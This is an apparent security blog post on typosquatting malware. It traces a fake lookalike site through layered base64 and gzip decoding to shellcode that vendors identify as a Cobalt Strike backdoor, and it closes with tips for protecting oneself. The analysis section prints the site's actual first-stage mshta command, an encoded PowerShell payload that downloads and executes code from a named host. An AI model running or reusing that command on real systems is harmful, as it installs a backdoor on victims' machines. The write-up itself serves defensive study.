What is Typo squatting Malware?
Typosquatting malware is a type of cyber attack that involves registering a domain name that is very similar to a legitimate website.
The attacker then uses this domain to trick users into thinking they are visiting a legitimate site, when in fact they are visiting a malicious site that is designed to infect their computer with malware.
According to Wikipedia, “Typosquatting, also called URL hijacking, a sting site, or a fake URL, is a form of cybersquatting, and possibly brandjacking which relies on mistakes such as typos made by Internet users when inputting a website address into a web browser.
Should a user accidentally enter an incorrect website address, they may be led to any URL (including an alternative website owned by a cybersquatter).”
How Does Typo squatting Malware Work?
Typosquatting malware works by taking advantage of common typing errors that users make when trying to visit a website.
Cybercriminals create websites that look very similar to legitimate ones, with just a slight difference in the URL. For example, they might create a website called www.goggle.com instead of www.google.com. When a user mistypes the URL, they end up on the fake website, which can look almost identical to the real one.
The fake website is designed to trick the user into entering sensitive information, such as login credentials, credit card numbers, or other personal data. Once the user enters the information, the malware on the fake website can capture it and send it back to the cyber criminals.
Some cyber criminals purchase domains similar to the ones you visit every day, hoping that during one of those evenings you are trying to watch funny cat videos on youtube.com, you accidentally type youtubr.com (example).
In this write up I will go over one of such cases I recently came across and I will analyze the malware that the malicious domain would download, with some (but not a whole lot) technical detail.
In our example, if you had misspelled just one letter in the URL you would be redirected to the following page (I am not providing the actual domain for confidentiality reasons).
As we can see from any.run analysis, there is quite a lot going on once you navigate to this suspicious website
The first command executed is
mshta vbscript:createobject(“wscript.shell”).run(“PowerShell -nop -exec bypass -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcAA6AC8ALwBrADAAawB6AC4AcgB1AC8AaQAuAHAAaABwAD8AaQA9ADEAJwA7AGkAZQB4ACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACQAYQApADsATQBzAGkATQBhAGsAZQAoACIAJABhACIAKwAnADUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMwAwAA0ACgB9AA0ACgA=”,0)(window.close)
mshta.exe is a Windows-native binary designed to execute Microsoft HTML Application (HTA) files. As its full name implies, Mshta can execute Windows Script Host code (VBScript and JScript) embedded within HTML in a network proxy-aware fashion.
As we can see there is a base64 encoded payload run with PowerShell. Let’s see what it does.
Looks like our base64 encoded PowerShell is trying to reach out to some “http://kokz[.]ru/” to download and run the string with IEX. The IEX (Invoke-Expression) cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.
Interesting… let’s see what it is trying to download.
woah! that’s a lot of base64. let’s try to decode it and understand what it is doing.
After base64 decoding the previous image we get this. Looks like another base64 encoded string, however now we also see that the script is trying to decompress Gzip compression.
Let’s base64 decode the string one more time and let’s save it into a file. As we can see the file command tells us that we have GZip compressed data just as we guessed.
After extracting the gzip compressed file we get another PowerShell script.
The following piece of code looks particularly interesting.
Here we have another base64 encoded payload, that is first base64 decoded and later there is done some byte arithmetic inside a for loop. Let’s see what is it exactly and as any cautious person would do, run the lines in PowerShell interpreter on our machine (NSFW).
We let the PowerShell do the arithmetic, that way we have less code to write. What we end up with, is a variable “$var_code” with around 800 lines of different numbers.
I wrote a small python script to convert the decimals we got from the PowerShell script into a byte array and write it to a file.
Let’s run the python script which will write the $var_code to out.bin file.
hmm… sus. Looks like a binary file with some gibberish but also some useful strings which are readable.
We are left with what appears to be the shell code. With the Strings command we can also see the host “cdn.hmthiooace.cfd”
let’s check out the file “out.bin” and hostname found in the ‘strings’ command output on Virustotal.
Numerous security vendors identify the file as a CobaltStrike backdoor. I guess we will go with that!
BLUF: try not to fat-finger wrong URLs 🙂
How to Protect Yourself from Typosquatting Malware
There are several steps you can take to protect yourself from typo squatting malware:
- Be careful when entering web addresses: Double-check the URL before hitting “Enter” to ensure you are on the legitimate website.
- Use a password manager: Password managers can help protect your login credentials from being stolen by malware.
- Keep your software up-to-date: Cybercriminals often exploit security vulnerabilities in outdated software to infect devices with malware. Make sure you regularly update your software to protect yourself.
- Use antivirus software: Antivirus software can detect and remove malware from your device. Make sure you have a reputable antivirus program installed and keep it up-to-date.
In conclusion, typosquatting malware is a serious threat to businesses and individuals alike. By understanding how it works and taking steps to protect yourself, you can reduce your risk of falling victim to this type of attack. If you have any questions or concerns about typosquatting malware, please don’t hesitate to contact us for more information.